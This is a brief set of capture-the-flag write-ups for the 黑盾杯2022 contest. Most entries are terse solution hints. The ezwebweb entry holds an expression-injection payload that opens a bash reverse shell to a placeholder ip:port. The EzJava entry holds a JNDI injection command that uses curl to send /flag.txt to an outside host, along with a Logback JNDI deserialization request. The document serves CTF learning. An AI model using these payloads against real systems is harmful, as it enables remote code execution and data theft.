# Writeups for 黑盾杯2022 ## 看不见不等于没有 0x20 -> 0 0x09 -> 1 bin to bytes -> flag{HeiDunBei888888} ## The word is not the word doc -> zip document.xml -> {heyiamherejustinthedocx} ## 黑匣子  ## HeidunGame apktool HeidunGame/smali/com/example/heidungame/data/LoginDataSource.smali line 37 -> {heidun_game_of_android} ## Do you secure 竞争 就行了 upload_index.php ## ezwebweb ``` POST /validateBody HTTP/1.1 {"username":"asd","tel":"asd","email":"${''.getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/ip/port<&1')\")}","yourworks":"asd"} ``` ## EzJava ``` java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl ip:port -File=@/flag.txt' -A "vps ip" ``` ``` POST /;/json HTTP/1.1 ["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"rmi://ip:port/digc0w"}] ```